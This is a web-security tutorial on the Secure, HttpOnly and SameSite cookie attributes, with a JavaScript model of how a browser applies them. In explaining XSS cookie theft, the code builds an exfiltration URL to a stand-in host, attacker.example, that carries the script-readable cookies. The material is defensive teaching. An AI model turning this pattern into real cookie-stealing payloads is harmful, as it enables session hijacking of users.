Secure, HttpOnly, SameSite HTTP Cookies Attributes and Set-Cookie Explained
Cookies are the most common way to give otherwise stateless HTTP some temporary persistence. Almost every website sets them, which is why we are all familiar with cookie consent banners. HTTP cookies can carry crucial and confidential data, such as session identifiers. Their use began around 1994, some important legacy design decisions were never fixed at the protocol level, and the security improvements that followed are still being tightened by browsers today.
The SameSite cookie attribute has been supported by modern browsers for quite some time, and its rules are now starting to be enforced by default.
For example, starting with Google Chrome v85 (released August 25, 2020), Chrome rejects, by default, any cookie that declares SameSite=None without also setting the Secure attribute. Changes like this can break your website if you are not up to date with the latest best practices. Using the attributes described below is already considered best practice, and modern browsers will (and should) enforce them soon.
In this article I'm going to explain each of them, why developers should care about them, and why implementing them correctly adds an extra layer of security to your website.
XSS can be mitigated by validating user input and encoding output, but one small mistake can have huge consequences, and simply stripping <script> tags is not enough on its own, because a payload can also arrive through event handler attributes and other vectors. Third-party scripts can compromise your users' security as well. Every year we hear about attacks of this kind succeeding.
Imagine your site stores a session cookie and one of its input fields is vulnerable to XSS. It is then quite straightforward for an attacker to inject a script that reads document.cookie and sends it off in an HTTP request to a URL similar to the following:
To prevent this kind of theft, every cookie that does not need to be read by JavaScript should carry the HttpOnly flag, which keeps it out of document.cookie even when a script is injected.
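As an added example (my own code, not code from the original article), the following plain JavaScript models how a browser applies these attributes to a handful of constructed Set-Cookie headers: which cookie Chrome 85 rejects outright (SameSite=None without Secure), which cookies an injected script can read through document.cookie (everything without HttpOnly), and which ones the browser attaches to same-site and cross-site requests. The host attacker.example and the cookie values are made up, and a cookie with no SameSite attribute is treated as Lax, which is what current Chrome does by default.

```javascript
// Added example, not code from the original article: a small model of how a
// browser applies the Secure, HttpOnly and SameSite attributes of Set-Cookie.
// Plain JavaScript, no browser APIs; attacker.example is a made-up host.

// Parse one Set-Cookie header value into a cookie record.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  if (eq <= 0) throw new Error('Set-Cookie needs name=value: ' + header);
  const cookie = {
    name: parts[0].slice(0, eq).trim(),
    value: parts[0].slice(eq + 1).trim(),
    secure: false,
    httpOnly: false,
    sameSite: null, // null means the attribute was absent
  };
  for (const attr of parts.slice(1)) {
    const [key, ...rest] = attr.split('=');
    const k = key.trim().toLowerCase();
    const v = rest.join('=').trim().toLowerCase();
    if (k === 'secure') cookie.secure = true;
    else if (k === 'httponly') cookie.httpOnly = true;
    else if (k === 'samesite') cookie.sameSite = v;
    // Path, Domain, Expires, Max-Age are not needed for this model.
  }
  return cookie;
}

// The Chrome 85 rule from the article: SameSite=None is only honoured together
// with Secure; otherwise the whole Set-Cookie is rejected.
function browserAccepts(cookie) {
  return !(cookie.sameSite === 'none' && !cookie.secure);
}

// Cookies without a SameSite attribute are treated as Lax by current Chrome
// (the temporary "Lax+POST" exception for top-level POSTs is not modelled).
function effectiveSameSite(cookie) {
  return cookie.sameSite === null ? 'lax' : cookie.sameSite;
}

// What an injected script sees in document.cookie: everything not HttpOnly.
function readableByScript(cookies) {
  return cookies
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Which stored cookies the browser attaches to a request.
// req = { https, crossSite, topLevelNavigation, method }
function cookiesSentOn(cookies, req) {
  return cookies
    .filter((c) => {
      if (c.secure && !req.https) return false; // Secure: HTTPS only
      if (!req.crossSite) return true;          // same-site: always attached
      const ss = effectiveSameSite(c);
      if (ss === 'strict') return false;        // Strict: never cross-site
      if (ss === 'lax') return req.topLevelNavigation && req.method === 'GET';
      return true;                              // None: sent cross-site (Secure was required)
    })
    .map((c) => c.name);
}

// Constructed scenario: the server sets three cookies; only the first one
// follows best practice.
const SET_COOKIE_HEADERS = [
  'session=abc123; Secure; HttpOnly; SameSite=Strict',
  'theme=dark; Path=/',
  'tracker=xyz; SameSite=None', // missing Secure: rejected by Chrome 85
];

function storedCookies(headers = SET_COOKIE_HEADERS) {
  return headers.map(parseSetCookie).filter(browserAccepts);
}

// The XSS payload from the article, modelled: the exfiltration URL an injected
// script would request with whatever document.cookie gives it.
function exfilUrl(cookies) {
  return 'https://attacker.example/collect?c=' + encodeURIComponent(readableByScript(cookies));
}

const jar = storedCookies();
console.log('accepted by browser:', jar.map((c) => c.name));
console.log('exfiltration URL:', exfilUrl(jar));
console.log('cross-site POST sends:',
  cookiesSentOn(jar, { https: true, crossSite: true, topLevelNavigation: false, method: 'POST' }));
console.log('cross-site top-level GET sends:',
  cookiesSentOn(jar, { https: true, crossSite: true, topLevelNavigation: true, method: 'GET' }));
console.log('same-site plain HTTP sends:',
  cookiesSentOn(jar, { https: false, crossSite: false, topLevelNavigation: true, method: 'GET' }));
```

Run it with node: the session cookie stays out of the exfiltration URL because of HttpOnly, out of the cross-site POST because of SameSite=Strict, and off plain HTTP because of Secure, while the unflagged theme cookie is readable by any injected script and is still attached to a cross-site top-level GET navigation under the Lax default.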